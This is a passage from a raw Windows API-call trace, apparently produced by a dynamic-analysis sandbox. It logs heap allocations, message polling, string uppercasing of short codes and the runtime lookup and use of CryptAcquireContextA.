dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0261.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0261.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.504] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0261.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0261.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0261.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.505] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.505] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.508] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.508] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.508] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0261.508] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.509] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0261.509] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.509] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.509] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.509] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.509] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.509] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.509] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.509] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.510] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.510] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.510] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.510] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.510] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.510] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.510] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.510] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.511] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0261.511] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.511] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0261.511] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.511] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.511] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.511] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.512] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.512] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.512] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.512] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.512] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.512] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.512] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.512] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.513] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.513] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.513] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.513] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.513] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.513] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.513] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.514] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.514] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.514] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.514] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.514] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.514] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.514] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.514] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0261.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.515] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.515] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.515] CharUpperBuffW (in: 